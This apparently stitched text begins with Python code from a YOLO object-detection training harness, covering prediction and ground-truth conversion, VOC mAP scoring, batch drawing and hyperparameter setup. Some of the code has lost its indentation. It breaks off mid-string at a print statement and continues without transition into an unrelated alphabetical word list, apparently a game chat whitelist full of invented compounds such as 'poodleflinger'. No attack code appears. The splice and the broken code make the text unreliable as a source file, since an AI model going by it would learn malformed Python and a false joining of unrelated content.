dmet._pred_aidbase += (len(pred_dets) + 1)
dmet.add_predictions(pred_dets, gid=gx)
for gx, true_dets in harn._labels_to_true_dets(inp_size, labels, _aidbase=dmet._true_aidbase):
dmet._true_aidbase += (len(true_dets) + 1)
dmet.add_truth(true_dets, gid=gx)
# if IS_PROFILING:
# torch.cuda.synchronize()
metrics_dict = ub.odict()
metrics_dict['L_bbox'] = float(harn.criterion.loss_coord)
metrics_dict['L_iou'] = float(harn.criterion.loss_conf)
metrics_dict['L_cls'] = float(harn.criterion.loss_cls)
for k, v in metrics_dict.items():
if not np.isfinite(v):
raise ValueError('{}={} is not finite'.format(k, v))
return metrics_dict
    def _postout_to_pred_dets(harn, inp_size, labels, batch_dets, _aidbase=1,
                              undo_lb=True):
        """
        Convert batch predictions to coco-style annotations for scoring.

        :param inp_size: network input size used to scale the predicted boxes
            to input-pixel coordinates (assumed (width, height) -- TODO confirm
            against the caller).
        :param labels: batch label dict; reads 'indices' and 'orig_sizes'.
        :param batch_dets: one detections object per image in the batch.
        :param _aidbase: starting annotation id, so ids stay unique across
            batches (the caller advances it between calls).
        :param undo_lb: if True, invert the letterbox transform so boxes are
            reported in original-image coordinates.

        Yields:
            Tuple[int, object]: image index and its predicted detections.
        """
        indices = labels['indices']
        orig_sizes = labels['orig_sizes']
        letterbox = harn.datasets[harn.current_tag].letterbox
        # None means "keep all detections"; acts as an open-ended slice below.
        MAX_DETS = None
        bsize = len(indices)
        for ix in range(bsize):
            pred_dets = batch_dets[ix]
            # Unpack postprocessed predictions
            pred_dets = pred_dets.numpy()
            # scale boxes (presumably normalized) to input-pixel coordinates
            pred_dets.boxes.scale(inp_size, inplace=True)
            if undo_lb:
                orig_size = orig_sizes[ix].data.cpu().numpy()
                pred_dets.data['boxes'] = letterbox._boxes_letterbox_invert(
                    pred_dets.boxes, orig_size, inp_size)
            else:
                pred_dets.data['boxes'] = pred_dets.boxes
            # sort predictions by descending score
            # Take at most MAX_DETS detections to evaluate
            _pred_sortx = pred_dets.argsort(reverse=True)[:MAX_DETS]
            pred_dets = pred_dets.take(_pred_sortx)
            # assign globally unique annotation ids to this image's detections
            pred_dets.data['aids'] = np.arange(_aidbase, _aidbase + len(pred_dets))
            _aidbase += len(pred_dets)
            gx = int(indices[ix].data)
            # if IS_PROFILING:
            #     torch.cuda.synchronize()
            yield gx, pred_dets
    def _labels_to_true_dets(harn, inp_size, labels, _aidbase=1, undo_lb=True):
        """
        Convert batch groundtruth to coco-style annotations for scoring.

        :param inp_size: network input size used when inverting the letterbox
            transform (assumed (width, height) -- TODO confirm against caller).
        :param labels: batch label dict; reads 'indices', 'orig_sizes',
            'targets' and 'gt_weights'.
        :param _aidbase: starting annotation id, so ids stay unique across
            batches (the caller advances it between calls).
        :param undo_lb: if True, invert the letterbox transform so boxes are
            reported in original-image coordinates.

        Yields:
            Tuple[int, kwimage.Detections]: image index and its true detections.
        """
        import kwimage
        indices = labels['indices']
        orig_sizes = labels['orig_sizes']
        targets = labels['targets']
        gt_weights = labels['gt_weights']
        letterbox = harn.datasets[harn.current_tag].letterbox
        # On the training set, we need to add truth due to augmentation
        bsize = len(indices)
        for ix in range(bsize):
            # each target row is (class_idx, cx, cy, w, h)
            target = targets[ix].view(-1, 5)
            true_det = kwimage.Detections(
                boxes=kwimage.Boxes(target[:, 1:5].float(), 'cxywh'),
                class_idxs=target[:, 0].long(),
                weights=gt_weights[ix],
            )
            true_det = true_det.numpy()
            # drop rows whose class index is -1 (presumably padding rows)
            flags = true_det.class_idxs != -1
            true_det = true_det.compress(flags)
            if undo_lb:
                orig_size = orig_sizes[ix].cpu().numpy()
                true_det.data['boxes'] = letterbox._boxes_letterbox_invert(
                    true_det.boxes, orig_size, inp_size)
            # assign globally unique annotation ids to this image's truth
            true_det.data['aids'] = np.arange(_aidbase, _aidbase + len(true_det))
            gx = int(indices[ix].data.cpu().numpy())
            # if IS_PROFILING:
            #     torch.cuda.synchronize()
            yield gx, true_det
    def on_epoch(harn):
        """
        custom callback

        Scores all predictions/truth accumulated in this epoch's detection
        metrics object (VOC mAP), then resets the accumulator for the next
        epoch.

        :return: ordered dict of metric name -> value (currently 'voc-mAP').

        CommandLine:
            python -m netharn.examples.yolo_voc YoloHarn.on_epoch

        Example:
            >>> # DISABLE_DOCTSET
            >>> harn = setup_yolo_harness(bsize=4)
            >>> harn.initialize()
            >>> weights_fpath = light_yolo.demo_voc_weights()
            >>> state_dict = harn.xpu.load(weights_fpath)['weights']
            >>> harn.model.module.load_state_dict(state_dict)
            >>> tag = harn.current_tag = 'test'
            >>> # run a few batches
            >>> for i in ub.ProgIter(range(5)):
            ...     batch = harn._demo_batch(i, tag)
            ...     outputs, loss = harn.run_batch(batch)
            ...     harn.on_batch(batch, outputs, loss)
            >>> # then finish the epoch
            >>> harn.on_epoch()
        """
        metrics_dict = ub.odict()
        # Measure quality
        dmet = harn.dmets[harn.current_tag]
        # Alternative scorers kept for reference (coco / netharn variants):
        # try:
        #     coco_scores = dmet.score_coco()
        #     metrics_dict['coco-mAP'] = coco_scores['mAP']
        # except ImportError:
        #     pass
        # except Exception as ex:
        #     print('ex = {!r}'.format(ex))
        # try:
        #     nh_scores = dmet.score_netharn()
        #     metrics_dict['nh-mAP'] = nh_scores['mAP']
        #     metrics_dict['nh-AP'] = nh_scores['peritem']['ap']
        # except Exception as ex:
        #     print('ex = {!r}'.format(ex))
        try:
            voc_scores = dmet.score_voc()
            metrics_dict['voc-mAP'] = voc_scores['mAP']
        except Exception as ex:
            # scoring failure is fatal; log context then propagate
            print('ex = {!r}'.format(ex))
            raise
        # Reset detections
        dmet.clear()
        dmet._pred_aidbase = 1
        dmet._true_aidbase = 1
        return metrics_dict
    def draw_batch(harn, batch, outputs, batch_dets, idx=None, thresh=None,
                   orig_img=None):
        """
        Render truth (green) and predicted (blue) boxes over batch images and
        stack the results into one visualization image.

        :param batch: (inputs, labels) pair as produced by the loader.
        :param outputs: raw network outputs (unused here; kept for signature
            compatibility with the caller).
        :param batch_dets: postprocessed detections, one per image.
        :param idx: draw only this batch index; None draws every image.
        :param thresh: if given, drop predictions with score <= thresh.
        :param orig_img: optional original image; only used as a shape sanity
            check against the letterbox-inverted image.

        Returns:
            np.ndarray: numpy image

        Example:
            >>> # DISABLE_DOCTSET
            >>> harn = setup_yolo_harness(bsize=1)
            >>> harn.initialize()
            >>> batch = harn._demo_batch(0, 'train')
            >>> weights_fpath = light_yolo.demo_voc_weights()
            >>> state_dict = harn.xpu.load(weights_fpath)['weights']
            >>> harn.model.module.load_state_dict(state_dict)
            >>> outputs, loss = harn.run_batch(batch)
            >>> harn.on_batch(batch, outputs, loss)
            >>> # xdoc: +REQUIRES(--show)
            >>> import kwplot
            >>> batch_dets = harn.model.module.postprocess(outputs)
            >>> kwplot.autompl()  # xdoc: +SKIP
            >>> stacked = harn.draw_batch(batch, outputs, batch_dets, thresh=0.01)
            >>> kwplot.imshow(stacked)
            >>> kwplot.show_if_requested()
        """
        import cv2
        import kwimage
        inputs, labels = batch
        targets = labels['targets']
        orig_sizes = labels['orig_sizes']
        if idx is None:
            idxs = range(len(inputs))
        else:
            idxs = [idx]
        imgs = []
        for idx in idxs:
            chw01 = inputs[idx]
            # each target row is (class_idx, cx, cy, w, h)
            target = targets[idx].view(-1, 5)
            pred_dets = batch_dets[idx]
            label_names = harn.datasets[harn.current_tag].label_names
            pred_dets.meta['classes'] = label_names
            true_dets = kwimage.Detections(
                boxes=kwimage.Boxes(target[:, 1:5], 'cxywh'),
                class_idxs=target[:, 0].int(),
                classes=label_names
            )
            pred_dets = pred_dets.numpy()
            true_dets = true_dets.numpy()
            # drop rows whose class index is -1 (presumably padding rows)
            true_dets = true_dets.compress(true_dets.class_idxs != -1)
            if thresh is not None:
                pred_dets = pred_dets.compress(pred_dets.scores > thresh)
            # CHW float tensor -> HWC numpy image in [0, 1]
            hwc01 = chw01.cpu().numpy().transpose(1, 2, 0)
            inp_size = np.array(hwc01.shape[0:2][::-1])
            true_dets.boxes.scale(inp_size, inplace=True)
            pred_dets.boxes.scale(inp_size, inplace=True)
            letterbox = harn.datasets[harn.current_tag].letterbox
            orig_size = orig_sizes[idx].cpu().numpy()
            target_size = inp_size
            img = letterbox._img_letterbox_invert(hwc01, orig_size, target_size)
            img = np.clip(img, 0, 1)
            # we are given the original image, to avoid artifacts from
            # inverting a downscale
            assert orig_img is None or orig_img.shape == img.shape
            true_dets.data['boxes'] = letterbox._boxes_letterbox_invert(
                true_dets.boxes, orig_size, target_size)
            pred_dets.data['boxes'] = letterbox._boxes_letterbox_invert(
                pred_dets.boxes, orig_size, target_size)
            # shift, scale, embed_size = letterbox._letterbox_transform(orig_size, target_size)
            # fig = kwplot.figure(doclf=True, fnum=1)
            # kwplot.imshow(img, colorspace='rgb')
            canvas = (img * 255).astype(np.uint8)
            canvas = true_dets.draw_on(canvas, color='green')
            canvas = pred_dets.draw_on(canvas, color='blue')
            canvas = cv2.resize(canvas, (300, 300))
            imgs.append(canvas)
        # if IS_PROFILING:
        #     torch.cuda.synchronize()
        stacked = imgs[0] if len(imgs) == 1 else kwimage.stack_images_grid(imgs)
        return stacked
def setup_yolo_harness(bsize=16, workers=0):
"""
CommandLine:
python -m netharn.examples.yolo_voc setup_yolo_harness
Example:
>>> # DISABLE_DOCTSET
>>> harn = setup_yolo_harness()
>>> harn.initialize()
"""
xpu = nh.XPU.coerce('argv')
nice = ub.argval('--nice', default='Yolo2Baseline')
batch_size = int(ub.argval('--batch_size', default=bsize))
bstep = int(ub.argval('--bstep', 4))
workers = int(ub.argval('--workers', default=workers))
decay = float(ub.argval('--decay', default=0.0005))
lr = float(ub.argval('--lr', default=0.001))
ovthresh = 0.5
simulated_bsize = bstep * batch_size
nh.configure_hacks(workers=workers)
# We will divide the learning rate by the simulated batch size
datasets = {
'train': YoloVOCDataset(years=[2007, 2012], split='trainval'),
# 'test': YoloVOCDataset(years=[2007], split='test'),
}
loaders = {
key: dset.make_loader(batch_size=batch_size, num_workers=workers,
shuffle=(key == 'train'), pin_memory=True,
resize_rate=10 * bstep, drop_last=True)
for key, dset in datasets.items()
}
anchors = np.array([(1.3221, 1.73145), (3.19275, 4.00944),
(5.05587, 8.09892), (9.47112, 4.84053),
(11.2364, 10.0071)])
if not ub.argflag('--eav'):
lr_step_points = {
# 0: lr * 0.1 / simulated_bsize, # burnin
# 4: lr * 1.0 / simulated_bsize,
0: lr * 1.0 / simulated_bsize,
154: lr * 1.0 / simulated_bsize,
155: lr * 0.1 / simulated_bsize,
232: lr * 0.1 / simulated_bsize,
233: lr * 0.01 / simulated_bsize,
}
max_epoch = 311
scheduler_ = (nh.schedulers.core.YOLOScheduler, {
'points': lr_step_points,
# 'interpolate': False,
'interpolate': True,
'burn_in': 0.96899225 if ub.argflag('--eav') else 3.86683584, # number of epochs to burn_in for. approx 1000 batches?
'dset_size': len(datasets['train']), # when drop_last=False
# 'dset_size': (len(datasets['train']) // simulated_bsize) * simulated_bsize, # make a multiple of batch_size because drop_last=True
'batch_size': batch_size,
})
from netharn.models.yolo2 import light_region_loss
criterion_ = (light_region_loss.RegionLoss, {
'num_classes': datasets['train'].num_classes,
'anchors': anchors,
'object_scale': 5.0,
'noobject_scale': 1.0,
# eav version originally had a random *2 in cls loss,
# we removed, that but we can replicate it here.
'class_scale': 1.0 if not ub.argflag('--eav') else 2.0,
'coord_scale': 1.0,
'thresh': 0.6, # iou_thresh
'seen_thresh': 12800,
# 'small_boxes': not ub.argflag('--eav'),
'small_boxes': True,
'mse_factor': 0.5 if not ub.argflag('--eav') else 1.0,
})
else:
lr_step_points = {
# dividing by batch size was one of those unpublished details
0: lr * 0.1 / simulated_bsize,
1: lr * 1.0 / simulated_bsize,
96: lr * 1.0 / simulated_bsize,
97: lr * 0.1 / simulated_bsize,
135: lr * 0.1 / simulated_bsize,
136: lr * 0.01 / simulated_bsize,
}
max_epoch = 176
scheduler_ = (nh.schedulers.ListedLR, {
'points': lr_step_points,
'interpolate': False,
})
from netharn.models.yolo2 import region_loss2
criterion_ = (region_loss2.RegionLoss, {
'num_classes': datasets['train'].num_classes,
'anchors': anchors,
'reduction': 32,
'seen': 0,
'coord_scale' : 1.0,
'noobject_scale' : 1.0,
'object_scale' : 5.0,
'class_scale' : 1.0,
'thresh' : 0.6, # iou_thresh
# 'seen_thresh': 12800,
})
weights = ub.argval('--weights', default=None)
if weights is None or weights == 'imagenet':
weights = light_yolo.initial_imagenet_weights()
elif weights == 'lightnet':
weights = light_yolo.demo_voc_weights()
else:
print('weights = {!r}'.format(weights))
hyper = nh.HyperParams(**{
'nice': nice,
'workdir': ub.expandpath('~/work/voc_yolo2'),
'datasets': datasets,
'loaders': loaders,
'xpu': xpu,
'model': (light_yolo.Yolo, {
'num_classes': datasets['train'].num_classes,
'anchors': anchors,
'conf_thresh': 0.001,
# 'conf_thresh': 0.1, # make training a bit faster
'nms_thresh': 0.5 if not ub.argflag('--eav') else 0.4
}),
'criterion': criterion_,
'initializer': (nh.initializers.Pretrained, {
'fpath': weights,
}),
'optimizer': (torch.optim.SGD, {
'lr': lr_step_points[0],
'momentum': 0.9,
'dampening': 0,
# multiplying by batch size was one of those unpublished details
'weight_decay': decay * simulated_bsize,
}),
'scheduler': scheduler_,
'monitor': (nh.Monitor, {
'minimize': ['loss'],
'maximize': ['mAP'],
'patience': max_epoch,
'max_epoch': max_epoch,
}),
# 'augment': datasets['train'].augmenter,
'dynamics': {
# Controls how many batches to process before taking a step in the
# gradient direction. Effectively simulates a batch_size that is
# `bstep` times bigger.
'batch_step': bstep,
},
'other': {
# Other params are not used internally, so you are free to set any
# extra params specific to your algorithm, and still have them
# logged in the hyperparam structure. For YOLO this is `ovthresh`.
'batch_size': batch_size,
'nice': nice,
'ovthresh': ovthresh, # used in mAP computation
'input_range': 'norm01',
},
})
print('max_epoch | |
'poodleflinger',
'poodleflip',
'poodleflipper',
'poodlefoot',
'poodlefuddy',
'poodlefussen',
'poodlegadget',
'poodlegargle',
'poodlegloop',
'poodleglop',
'poodlegoober',
'poodlegoose',
'poodlegrooven',
'poodlehoffer',
'poodlehopper',
'poodlejinks',
'poodleklunk',
'poodleknees',
'poodlemarble',
'poodlemash',
'poodlemonkey',
'poodlemooch',
'poodlemouth',
'poodlemuddle',
'poodlemuffin',
'poodlemush',
'poodlenerd',
'poodlenoodle',
'poodlenose',
'poodlenugget',
'poodlephew',
'poodlephooey',
'poodlepocket',
'poodlepoof',
'poodlepop',
'poodlepounce',
'poodlepow',
'poodlepretzel',
'poodlequack',
'poodleroni',
'poodlescooter',
'poodlescreech',
'poodlesmirk',
'poodlesnooker',
'poodlesnoop',
'poodlesnout',
'poodlesocks',
'poodlespeed',
'poodlespinner',
'poodlesplat',
'poodlesprinkles',
'poodlesticks',
'poodlestink',
'poodleswirl',
'poodleteeth',
'poodlethud',
'poodletoes',
'poodleton',
'poodletoon',
'poodletooth',
'poodletwist',
'poodlewhatsit',
'poodlewhip',
'poodlewig',
'poodlewoof',
'poodlezaner',
'poodlezap',
'poodlezapper',
'poodlezilla',
'poodlezoom',
"pooh's",
'pool',
'pooled',
'pooling',
'pools',
'poor',
'poorer',
'poorest',
'poorly',
'pop',
"pop's",
'popcorn',
'popcorns',
'poplar',
'poplin',
'popovers',
'poppenbee',
'poppenberry',
'poppenblabber',
'poppenbocker',
'poppenboing',
'poppenboom',
'poppenbounce',
'poppenbouncer',
'poppenbrains',
'poppenbubble',
'poppenbumble',
'poppenbump',
'poppenbumper',
'poppenburger',
'poppenchomp',
'poppencorn',
'poppencrash',
'poppencrumbs',
'poppencrump',
'poppencrunch',
'poppendoodle',
'poppendorf',
'poppenface',
'poppenfidget',
'poppenfink',
'poppenfish',
'poppenflap',
'poppenflapper',
'poppenflinger',
'poppenflip',
'poppenflipper',
'poppenfoot',
'poppenfuddy',
'poppenfussen',
'poppengadget',
'poppengargle',
'poppengloop',
'poppenglop',
'poppengoober',
'poppengoose',
'poppengrooven',
'poppenhoffer',
'poppenhopper',
'poppenjinks',
'poppenklunk',
'poppenknees',
'poppenmarble',
'poppenmash',
'poppenmonkey',
'poppenmooch',
'poppenmouth',
'poppenmuddle',
'poppenmuffin',
'poppenmush',
'poppennerd',
'poppennoodle',
'poppennose',
'poppennugget',
'poppenphew',
'poppenphooey',
'poppenpocket',
'poppenpoof',
'poppenpop',
'poppenpounce',
'poppenpow',
'poppenpretzel',
'poppenquack',
'poppenroni',
'poppenscooter',
'poppenscreech',
'poppensmirk',
'poppensnooker',
'poppensnoop',
'poppensnout',
'poppensocks',
'poppenspeed',
'poppenspinner',
'poppensplat',
'poppensprinkles',
'poppensticks',
'poppenstink',
'poppenswirl',
'poppenteeth',
'poppenthud',
'poppentoes',
'poppenton',
'poppentoon',
'poppentooth',
'poppentwist',
'poppenwhatsit',
'poppenwhip',
'poppenwig',
'poppenwoof',
'poppenzaner',
'poppenzap',
'poppenzapper',
'poppenzilla',
'poppenzoom',
'popping',
'poppins',
'poppy',
'poppy-puff',
'poppyseed',
'pops',
'popsicle',
'popsicles',
'popular',
'popularity',
'popularly',
'populate',
'populated',
'populates',
'populating',
'population',
'populations',
'popup',
'por',
'porch',
'porcupine',
'porgy',
'pork',
'porkchop',
'poro',
'porpoise',
'port',
'portable',
'portal',
'ported',
'porter',
'porters',
'porting',
'portly',
'portmouths',
'portrait',
'portraits',
'ports',
'porygon',
'pose',
'posh',
'posies',
'position',
'positioned',
'positioning',
'positions',
'positive',
'positively',
'positives',
'positivity',
'posse',
'possess',
'possessions',
'possibilities',
'possibility',
"possibility's",
'possible',
'possibles',
'possibly',
'possum',
"possum's",
'possums',
'post',
'post-concert',
'post-show',
'postcard',
'postcards',
'posted',
'poster',
'posters',
'posthaste',
'posting',
'postings',
'postman',
'postmaster',
'posts',
'postshow',
'posture',
'posy',
'pot',
'potato',
"potato's",
'potatoes',
'potatos',
'potc',
'potential',
'potentially',
'potentials',
'potion',
"potion's",
'potions',
'potpies',
'pots',
'pots-and-pans',
'potsen',
'potter',
'pouch',
'pouches',
'pounce',
'pour',
"pour's",
'poured',
'pourer',
'pourers',
'pouring',
'pours',
'pouty',
'pow',
'powder-burnt',
'powdered',
'powders',
'powe',
'power',
"power's",
'powered',
'powerful',
'powerfully',
'powerhouse',
'powering',
'powers',
'pox',
'ppl',
'practical',
'practicality',
'practically',
'practice',
"practice's",
'practices',
'practicing',
'prairie',
'prairies',
'pram',
'prank',
'pranked',
'pranks',
'pratt',
'prattle',
'prawn',
'pre',
'pre-concert',
'precious',
'preciousbee',
'preciousberry',
'preciousblabber',
'preciousbocker',
'preciousboing',
'preciousboom',
'preciousbounce',
'preciousbouncer',
'preciousbrains',
'preciousbubble',
'preciousbumble',
'preciousbump',
'preciousbumper',
'preciousburger',
'preciouschomp',
'preciouscorn',
'preciouscrash',
'preciouscrumbs',
'preciouscrump',
'preciouscrunch',
'preciousdoodle',
'preciousdorf',
'preciousface',
'preciousfidget',
'preciousfink',
'preciousfish',
'preciousflap',
'preciousflapper',
'preciousflinger',
'preciousflip',
'preciousflipper',
'preciousfoot',
'preciousfuddy',
'preciousfussen',
'preciousgadget',
'preciousgargle',
'preciousgloop',
'preciousglop',
'preciousgoober',
'preciousgoose',
'preciousgrooven',
'precioushoffer',
'precioushopper',
'preciousjinks',
'preciousklunk',
'preciousknees',
'preciousmarble',
'preciousmash',
'preciousmonkey',
'preciousmooch',
'preciousmouth',
'preciousmuddle',
'preciousmuffin',
'preciousmush',
'preciousnerd',
'preciousnoodle',
'preciousnose',
'preciousnugget',
'preciousphew',
'preciousphooey',
'preciouspocket',
'preciouspoof',
'preciouspop',
'preciouspounce',
'preciouspow',
'preciouspretzel',
'preciousquack',
'preciousroni',
'preciousscooter',
'preciousscreech',
'precioussmirk',
'precioussnooker',
'precioussnoop',
'precioussnout',
'precioussocks',
'preciousspeed',
'preciousspinner',
'precioussplat',
'precioussprinkles',
'precioussticks',
'preciousstink',
'preciousswirl',
'preciousteeth',
'preciousthud',
'precioustoes',
'preciouston',
'precioustoon',
'precioustooth',
'precioustwist',
'preciouswhatsit',
'preciouswhip',
'preciouswig',
'preciouswoof',
'preciouszaner',
'preciouszap',
'preciouszapper',
'preciouszilla',
'preciouszoom',
'precipice',
'precipitate',
'precipitated',
'precipitates',
'precipitating',
'precipitation',
'precisely',
'precocious',
'predicaments',
'predict',
'predictometer',
'predicts',
'pree',
'prefab',
'prefer',
'preference',
'preferences',
'preferred',
'prefers',
'prefix',
'prefixes',
'prehysterical',
'premiere',
'premium',
'prepare',
'prepared',
'preparedness',
'preparer',
'prepares',
'preparing',
'preposition',
'prepositions',
'prepostera',
'prescription',
'prescriptions',
'presence',
"presence's",
'presences',
'present',
'presentation',
'presentations',
'presented',
'presenter',
"presenter's",
'presenters',
'presenting',
'presently',
'presents',
'preserver',
'preservers',
'president',
"presidents'",
'press',
'pressed',
'presser',
'presses',
'pressing',
'pressings',
'presto',
'pretend',
'pretended',
'pretender',
"pretender's",
'pretenders',
'pretending',
'pretends',
'pretentious',
'prettied',
'prettier',
'pretties',
'prettiest',
'pretty',
'prettying',
'pretzel',
'pretzels',
'prev',
'prevent',
'prevented',
'preventer',
'preventing',
'prevention',
'preventive',
'prevents',
'preview',
'previous',
'previously',
'priate',
'price',
'priced',
'pricer',
'pricers',
'prices',
'pricing',
'prickly',
'pride',
"pride's",
'prigate',
'prilla',
"prilla's",
'prim',
'primape',
'primaries',
'primary',
"primary's",
'primate',
'prime',
'primed',
'primely',
'primer',
'primers',
'primes',
'priming',
'primitive',
'primp',
'primrose',
'prince',
"prince's",
'princely',
'princes',
'princess',
"princess's",
'princesses',
'principal',
"principal's",
'principals',
'principle',
'principled',
'principles',
'prinna',
'print',
'printed',
'printer',
"printer's",
'printers',
'printing',
'prints',
'prior',
'priorities',
'priority',
"priority's",
'pristine',
'privacy',
'privateer',
"privateer's",
'privateered',
'privateering',
'privateers',
'privilege',
'privileged',
'privileges',
'prix',
'prize',
'prized',
'prizer',
'prizers',
'prizes',
'prizing',
'prizmod',
"prizmod's",
'pro',
'proactive',
'prob',
'probability',
'probably',
'problem',
"problem's",
'problems',
'procastinators',
'procedure',
'procedures',
'proceed',
'proceeded',
'proceeding',
'proceedings',
'proceeds',
'process',
"process's",
'processed',
'processes',
'processing',
'proddy',
'prodigies',
'prodigy',
'produce',
'produced',
'producer',
'producers',
'produces',
'producing',
'product',
"product's",
'production',
'productive',
'products',
'prof',
'professor',
"professor's",
'professors',
'profile',
'profiles',
'profit',
"profit's",
'profited',
'profiter',
'profiters',
'profiting',
'profits',
'program',
"program's",
'programed',
'programing',
'programmer',
'programmers',
'programs',
'progress',
'progressed',
'progresses',
'progressing',
'progressive',
'prohibit',
'prohibited',
'prohibiting',
'prohibits',
'project',
"project's",
'projectaltis',
'projectaltis.com',
'projected',
'projectile',
'projecting',
'projective',
'projector',
'projectors',
'projects',
'prolly',
'prom',
'promise',
'promised',
'promiser',
'promises',
'promising',
'promo',
'promos',
'promote',
'promoted',
'promoter',
"promoter's",
'promoters',
'promotes',
'promoting',
'promotion',
'promotional',
'promotions',
'promotive',
'prompt',
'prompter',
'prompters',
'pronto',
'proof',
"proof's",
'proofed',
'proofer',
'proofing',
'proofs',
'prop',
'propeller',
'propellers',
'propellor',
'proper',
'properly',
'propertied',
'properties',
'property',
'proposal',
"proposal's",
'proposals',
'propose',
'proposes',
'proposition',
'props',
'prospect',
'prospected',
'prospecting',
'prospective',
'prospector',
"prospector's",
'prospects',
'prospit',
'protect',
'protected',
'protecting',
"protection's",
'protections',
'protective',
'protects',
'prototype',
'proud',
'proudest',
'prove',
'proved',
'prover',
"prover's",
'provers',
'proves',
'provide',
'provided',
'providence',
'provider',
'providers',
'provides',
'providing',
'proving',
'provoke',
'provoked',
'provokes',
'provoking',
'prow',
'prower',
'proximity',
'proxy',
'prudence',
'prunaprismia',
'prussia',
'prussian',
'prymme',
'ps2',
'ps3',
'ps4',
'psa',
'psp',
'psyched',
'psychic',
"psychic's",
'psychics',
'psyduck',
'pt',
'pt.',
'ptr',
'public',
'public pastes',
"public's",
'publicly',
'publics',
'publish',
'published',
'publisher',
"publisher's",
'publishers',
'publishes',
'publishing',
'pucca',
'puccas',
'puce',
'pucker',
'pudding',
'puddle',
'puddles',
'pudge',
'pufferang',
'puffle',
'puffles',
'puffy',
'pug',
"pugpratt's",
'pula',
'pull',
'pulled',
'puller',
'pulling',
'pullings',
'pullover',
'pullovers',
'pulls',
'pulse',
'pulyurleg',
'pumba',
"pumba's",
'pumbaa',
"pumbaa's",
'pumbaas',
'pummel',
'pump',
'pumpkin',
"pumpkin's",
'pumpkinbee',
'pumpkinberry',
'pumpkinblabber',
'pumpkinbocker',
'pumpkinboing',
'pumpkinboom',
'pumpkinbounce',
'pumpkinbouncer',
'pumpkinbrains',
'pumpkinbubble',
'pumpkinbumble',
'pumpkinbump',
'pumpkinbumper',
'pumpkinburger',
'pumpkinchomp',
'pumpkincorn',
'pumpkincrash',
'pumpkincrumbs',
'pumpkincrump',
'pumpkincrunch',
'pumpkindoodle',
'pumpkindorf',
'pumpkinface',
'pumpkinfidget',
'pumpkinfink',
'pumpkinfish',
'pumpkinflap',
'pumpkinflapper',
'pumpkinflinger',
'pumpkinflip',
'pumpkinflipper',
'pumpkinfoot',
'pumpkinfuddy',
'pumpkinfussen',
'pumpkingadget',
'pumpkingargle',
'pumpkingloop',
'pumpkinglop',
'pumpkingoober',
'pumpkingoose',
'pumpkingrooven',
'pumpkinhoffer',
'pumpkinhopper',
'pumpkinjinks',
'pumpkinklunk',
'pumpkinknees',
'pumpkinmarble',
'pumpkinmash',
'pumpkinmonkey',
'pumpkinmooch',
'pumpkinmouth',
'pumpkinmuddle',
'pumpkinmuffin',
'pumpkinmush',
'pumpkinnerd',
'pumpkinnoodle',
'pumpkinnose',
'pumpkinnugget',
'pumpkinphew',
'pumpkinphooey',
'pumpkinpocket',
'pumpkinpoof',
'pumpkinpop',
'pumpkinpounce',
'pumpkinpow',
'pumpkinpretzel',
'pumpkinquack',
'pumpkinroni',
'pumpkins',
'pumpkinscooter',
'pumpkinscreech',
'pumpkinsmirk',
'pumpkinsnooker',
'pumpkinsnoop',
'pumpkinsnout',
'pumpkinsocks',
'pumpkinspeed',
'pumpkinspinner',
'pumpkinsplat',
'pumpkinsprinkles',
'pumpkinsticks',
'pumpkinstink',
'pumpkinswirl',
'pumpkinteeth',
'pumpkinthud',
'pumpkintoes',
'pumpkinton',
'pumpkintoon',
'pumpkintooth',
'pumpkintwist',
'pumpkinwhatsit',
'pumpkinwhip',
'pumpkinwig',
'pumpkinwoof',
'pumpkinzaner',
'pumpkinzap',
'pumpkinzapper',
'pumpkinzilla',
'pumpkinzoom',
'pun',
'punchline',
'punchlines',
'punchy',
'punctuality',
'punctuation',
'punk',
'punny',
'puns',
'puny',
'pup',
'pupert',
"pupert's",
'pupil',
'pupils',
'puppet',
'puppets',
'puppies',
'puppy',
"puppy's",
'purchase',
'purchased',
'purchaser',
"purchaser's",
'purchasers',
'purchases',
'purchasing',
'pure',
'purebred',
'puree',
'purim',
"purim's",
'purple',
'purplebee',
'purpleberry',
'purpleblabber',
'purplebocker',
'purpleboing',
'purpleboom',
'purplebounce',
'purplebouncer',
'purplebrains',
'purplebubble',
'purplebumble',
'purplebump',
'purplebumper',
'purpleburger',
'purplechomp',
'purplecorn',
'purplecrash',
'purplecrumbs',
'purplecrump',
'purplecrunch',
'purpledoodle',
'purpledorf',
'purpleface',
'purplefidget',
'purplefink',
'purplefish',
'purpleflap',
'purpleflapper',
'purpleflinger',
'purpleflip',
'purpleflipper',
'purplefoot',
'purplefuddy',
'purplefussen',
'purplegadget',
'purplegargle',
'purplegloop',
'purpleglop',
'purplegoober',
'purplegoose',
'purplegrooven',
'purplehoffer',
'purplehopper',
'purplejinks',
'purpleklunk',
'purpleknees',
'purplemarble',
'purplemash',
'purplemonkey',
'purplemooch',
'purplemouth',
'purplemuddle',
'purplemuffin',
'purplemush',
'purplenerd',
'purplenoodle',
'purplenose',
'purplenugget',
'purplephew',
'purplephooey',
'purplepocket',
'purplepoof',
'purplepop',
'purplepounce',
'purplepow',
'purplepretzel',
'purplequack',
'purpleroni',
'purplescooter',
'purplescreech',
'purplesmirk',
'purplesnooker',
'purplesnoop',
'purplesnout',
'purplesocks',
'purplespeed',
'purplespinner',
'purplesplat',
'purplesprinkles',
'purplesticks',
'purplestink',
'purpleswirl',
'purpleteeth',
'purplethud',
'purpletoes',
'purpleton',
'purpletoon',
'purpletooth',
'purpletwist',
'purplewhatsit',
'purplewhip',
'purplewig',
'purplewoof',
'purplezaner',
'purplezap',
'purplezapper',
'purplezilla',
'purplezoom',
'purpose',
'purposed',
'purposely',
'purposes',
'purposing',
'purposive',
'purr',
'purr-fect',
'purr-fectly',
'purr-form',
'purrfect',
'purrfection',
'purrfectly',
'purrty',
'purse',
'pursuit',
'pursuits',
'push',
'pushed',
'pusher',
'pushers',
'pushes',
'pushing',
'put',
'putrid',
'puts',
'putt',
'putt-putt',
'putting',
'putts',
'puzzle',
'puzzled',
'puzzler',
"puzzler's",
'puzzlers',
'puzzles',
'puzzling',
'puzzlings',
'pvp',
'pwnage',
'pwncake',
'pwned',
'pyjama',
'pyjamas',
'pyle',
'pylon',
'pyramid',
'pyrate',
'pyrates',
'pyrats',
'pyro',
'python',
'qack',
'qc',
'quack',
'quacken',
'quacker',
'quackintosh',
'quackity',
'quacks',
'quacky',
'quad',
'quad-barrel',
'quad-barrels',
'quadrant',
'quadrilles',
'quads',
'quaint',
'quake',
'qualification',
'qualifications',
'qualified',
'qualifier',
"qualifier's",
'qualifiers',
'qualifies',
'qualify',
'qualifying',
